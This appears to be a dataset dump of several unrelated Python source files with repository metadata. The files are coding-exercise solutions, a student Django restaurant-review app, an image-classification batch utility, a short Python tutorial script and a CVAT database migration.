e7706c9c880387da59ac49f8aa30a68916b0a45d | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /T3p8AkyXcE9ALkWbA_9.py | 064d3b2bb82263a46190b538dd1a0cef90d0e288 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 702 | py | """
Given a sandwich (as a _list_ ), return a list of fillings inside the
sandwich. This involves **ignoring** the first and last elements.
### Examples
get_fillings(["bread", "ham", "cheese", "ham", "bread"]) ➞ ["ham", "cheese", "ham"]
get_fillings(["bread", "sausage", "tomato", "bread"]) ➞ ["sausage", "tomato"]
get_fillings(["bread", "lettuce", "bacon", "tomato", "bread"]) ➞ ["lettuce", "bacon", "tomato"]
### Notes
The first and last elements will always be `"bread"`.
"""
def get_fillings(sandwich):
#Given a sandwich (as a list), return a list of fillings inside the sandwich.
#This involves ignoring the first and last elements.
return sandwich[1:-1]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
86cd3845af903809196a1520a7ec45b2e8b97071 | 66eb164d6db38c7e25949179025b0f9afc8887c8 | /midterm/task1/main/views.py | 0fc78fcab702bf3363f45bb1808c62641d6e8ab8 | [] | no_license | akbota123/BFDjango | 89c273c68464768ddbc1fbd7253fad59e071feb0 | 0209486f3fe74158f5768933b583bc328f578186 | refs/heads/master | 2020-03-28T02:50:45.374114 | 2018-11-25T08:11:59 | 2018-11-25T08:11:59 | 147,601,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,215 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
from datetime import datetime, timedelta
from .models import User, Restaurant, Review, Dish, RestaurantReview, DishReview
from .forms import UserForm, RestaurantForm, DishForm, ReviewForm
from django.contrib.auth.decorators import login_required
# Create your views here.
def home(request):
return render(request, 'home.html')
@login_required
def resta(request):
resta=Restaurant.objects.all()
context={'Restaurant':resta}
return render(request, 'restaurant.html', context)
def resta_filter(request, rf):
resta_f=Restaurant.objects.order_by(rf)
context={'Restaurant':resta_f}
return render(request, 'restaurant.html', context)
@login_required
def resta_add(request):
if request.method=='POST':
form=RestaurantForm(request.POST)
if form.is_valid():
form.save()
return redirect('restaurant')
else:
form=RestaurantForm()
context={'form':form}
return render(request, 'new.html', context)
@login_required
def dish(request):
meal=Dish.objects.all()
context={'Dish', meal}
return render(request, 'dish.html', context)
| [
"akbota.mamadyarova98@gmail.com"
] | akbota.mamadyarova98@gmail.com |
e47fed16f9926c78b145bcf701a21250ca615ad4 | 1e9c67785cd2a07fbd12b63bd93a2eba2272f237 | /image_task_classif/batch_util_classif.py | 61b5d4ffde0b566ae90f6a25bd11e0afa531f23c | [] | no_license | monisha-jega/mmd | 2975d0f77bce4db38795fa201f515f35498f0eb3 | d4f9d2c94409c2877ff5a5a2242e7e7ed2f87921 | refs/heads/master | 2022-07-20T17:01:39.043859 | 2020-05-16T23:31:35 | 2020-05-16T23:31:35 | 264,543,426 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,717 | py | import numpy as np
from parameters_classif import *
import pickle
from annoy import AnnoyIndex
if use_images == True:
#Load annoy file for image representations
url_to_index = pickle.load(open(annoy_dir+"ImageUrlToIndex.pkl", 'rb'))
#print(type(url_to_index))
#print(url_to_index)
a = AnnoyIndex(image_size)
a.load(annoy_dir+'annoy.ann')
#print(a.get_n_items())
#print(a.get_item_vector(0), a.get_item_vector(1), a.get_item_vector(2))
print("annoy file loaded")
def image_rep(image_url):
v = np.array([0 for e in range(image_size)])
if image_url in ["", 'RANDOM']:
return np.array(v)
try:
index = url_to_index[image_url.strip()]
v = np.array(a.get_item_vector(index))
except:
if use_images == True:
print(image_url + " exception loading from annoy")
return v
def pad_for_batch_size(batch_images, batch_gender_targets, batch_color_targets, batch_mat_targets):
if(len(batch_images) != batch_size):
pad_size = batch_size - len(batch_images)%batch_size
empty_data_mat = ["RANDOM" for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_images = np.vstack((batch_images, empty_data_mat))
empty_data_mat = [num_gender_classes for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_gender_targets = np.vstack((batch_gender_targets, empty_data_mat))
empty_data_mat = [0 for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_color_targets = np.vstack((batch_color_targets, empty_data_mat))
empty_data_mat = [0 for i in range(pad_size)]
empty_data_mat = np.array(empty_data_mat)
batch_mat_targets = np.vstack((batch_mat_targets, empty_data_mat))
return batch_images, batch_gender_targets, batch_color_targets, batch_mat_targets
def process_batch(data_batch):
batch_images = []
batch_gender_targets_list = []
batch_color_targets_list = []
batch_mat_targets_list = []
for instance in data_batch:
batch_images.append(instance[0])
batch_gender_targets_list.append(instance[1])
batch_color_targets_list.append(instance[2])
batch_mat_targets_list.append(instance[3])
batch_images, batch_gender_targets_list, batch_color_targets_list, batch_mat_targets_list = pad_for_batch_size(batch_images, batch_gender_targets_list, batch_color_targets_list, batch_mat_targets_list)
batch_images = [image_rep(image) for image in batch_images]
return batch_images, batch_gender_targets_list, batch_color_targets_list, batch_mat_targets_list
| [
"monishaj@Monishas-MacBook-Pro.local"
] | monishaj@Monishas-MacBook-Pro.local |
34055a4fe950c03e9b14fbf71245f7018cd9a95f | 07bae7671cac165fb91554343396ee1343c6363d | /function1/function11.py | 6270f172902973c8623b78a4b6be14ec8266b9d7 | [] | no_license | quyixiao/python_lesson | 7869dfd3aec8f5b6500ae955ae5c50a956f7b4c3 | 81684d06e6f054049fa79b0e63ab528bdc46581f | refs/heads/master | 2021-06-28T08:01:02.937679 | 2021-03-11T10:29:57 | 2021-03-11T10:29:57 | 221,687,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | def foo(xyz=None,u = 'abc',z = 123):
if xyz is None:
xyz = []
xyz.append(1)
print(xyz)
return xyz
foo()
print(1,foo.__defaults__)
foo()
print(2,foo.__defaults__)
foo([10])
print(3,foo.__defaults__)
foo([10,5])
print(4,foo.__defaults__)
lst = [5]
lst = foo(lst)
print(lst)
print(5,foo.__defaults__)
# 默认值的作用域
# 每一种方式
# 使用影子拷贝创建一个新的对象 ,永远不能改变传入的参数
# 第二种方式
# 通过值的判断就可以灵活的选择,
# 这种方法灵活,应用广泛
# 很多的函数的定义,都可以看到,如果传入的是非null,那么惯用的用法,
# 使用nonlocal关键字,将变量标记为在上级的局部的作用域中定义,但是不能是全局的作用域中定义,
# 属性_defaults_
| [
"2621048238@qq.com"
] | 2621048238@qq.com |
5f032aa8c9470c0b7a0d2698e0f484ed42feb7cc | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/35_v5/top_n.py | fc535d7af4fae5ca8aea70499c63cf182862e79f | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,234 | py | # ____ d__ _______ d__
# _______ h__
# ____ o.. _______ attrgetter
#
# numbers [0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5, -6, 6]
# dates d__(2018, 1, 23, 0, 0),
# d__(2017, 12, 19, 0, 0),
# d__(2017, 10, 15, 0, 0),
# d__(2019, 2, 27, 0, 0),
# d__(2017, 3, 29, 0, 0),
# d__(2018, 8, 11, 0, 0),
# d__(2018, 5, 3, 0, 0),
# d__(2018, 12, 19, 0, 0),
# d__(2018, 11, 19, 0, 0),
# d__(2017, 7, 7, 0, 0
# # https://www.forbes.com/celebrities/list
# earnings_mln
# {'name': 'Kevin Durant', 'earnings': 60.6},
# {'name': 'Adele', 'earnings': 69},
# {'name': 'Lionel Messi', 'earnings': 80},
# {'name': 'J.K. Rowling', 'earnings': 95},
# {'name': 'Elton John', 'earnings': 60},
# {'name': 'Chris Rock', 'earnings': 57},
# {'name': 'Justin Bieber', 'earnings': 83.5},
# {'name': 'Cristiano Ronaldo', 'earnings': 93},
# {'name': 'Beyoncé Knowles', 'earnings': 105},
# {'name': 'Jackie Chan', 'earnings': 49},
#
#
#
# ___ get_largest_number numbers n_3
# r.. h__.n.. ? ?
#
#
# ___ get_latest_dates dates n_3
# r.. h__.n.. ? ?
#
#
# ___ get_highest_earnings earnings_mln n_3
# r.. h__.n.. ? ? k.._l.... x| ? 'earnings'
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
559cc23ee0088ba255f51cac038b41d9882f11cc | 2eab4a6fa0b525dc49fe06fd3c8f4e56dabe2ad2 | /python/Calculate Fibonacci return count of digit occurrences.py | f7180023010e239d0de95d1cb3b45a34f5c8b4ea | [] | no_license | bthowe/codewars | 6563aa2c49bb876d3945620a27f95940f75130c6 | fea2593c24b9e7f89ee33d1afb31581364e6f567 | refs/heads/master | 2020-07-01T02:59:35.113100 | 2017-02-06T19:57:34 | 2017-02-06T19:57:34 | 74,102,013 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | from collections import Counter
def fib(n):
n0 = 0
n1 = 1
count = 1
while count<n:
n2 = n0 + n1
n0 = n1
n1 = n2
count+=1
if n==0:
return 0
elif n==1:
return 1
else:
return n2
def fib_digits(n):
fib_num = fib(n)
return sorted([(v, int(k)) for k, v in dict(Counter(str(fib_num))).iteritems()])[::-1]
# print Counter(str(fib_num)).items()
if __name__=="__main__":
print fib_digits(100000)
| [
"b.travis.howe@gmail.com"
] | b.travis.howe@gmail.com |
c288c47b0ee58b847eafd53a54b97c0dbe7b513b | 52cb25dca22292fce4d3907cc370098d7a57fcc2 | /SWEA/5202_화물 도크.py | b568642b10f3da83d05c58573e217c3b11c3bb77 | [] | no_license | shjang1013/Algorithm | c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a | 33f2caa6339afc6fc53ea872691145effbce0309 | refs/heads/master | 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | # 문제
# SWEA 5202 - [파이썬 S/W 문제해결 구현 3일차] 탐욕 알고리즘 - 화물 도크
# 나의 코드
T = int(input())
for tc in range(T):
N = int(input())
time = []
Lorry = []
for i in range(N):
time.append(list(map(int, input().split())))
time.sort(key = lambda i:i[1])
Lorry.append(time[0])
for k in range(N):
if Lorry[-1][1] <= time[k][0]:
Lorry.append(time[k])
i += 1
print("#%d %d" %(tc+1, len(Lorry)))
| [
"shjang113@gmail.com"
] | shjang113@gmail.com |
b37de288b6b30b48e14d7fb169d4d8fe6c4bbccd | dac12c9178b13d60f401c4febff5569af8aa2719 | /cvat/apps/engine/migrations/0050_auto_20220211_1425.py | 67322fca1254fb9f2986368a567e10d4f4876a05 | [
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later"
] | permissive | opencv/cvat | 39dc66ca20f972ba40b79c44d7ce43590dc0b0b5 | 899c9fd75146744def061efd7ab1b1c6c9f6942f | refs/heads/develop | 2023-08-19T04:27:56.974498 | 2023-08-18T09:58:25 | 2023-08-18T09:58:25 | 139,156,354 | 6,558 | 1,887 | MIT | 2023-09-14T12:44:39 | 2018-06-29T14:02:45 | TypeScript | UTF-8 | Python | false | false | 822 | py | # Generated by Django 3.2.12 on 2022-02-11 14:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('engine', '0049_auto_20220202_0710'),
]
operations = [
migrations.RemoveField(
model_name='trainingprojectimage',
name='task',
),
migrations.RemoveField(
model_name='trainingprojectlabel',
name='cvat_label',
),
migrations.RemoveField(
model_name='project',
name='training_project',
),
migrations.DeleteModel(
name='TrainingProject',
),
migrations.DeleteModel(
name='TrainingProjectImage',
),
migrations.DeleteModel(
name='TrainingProjectLabel',
),
]
| [
"noreply@github.com"
] | opencv.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.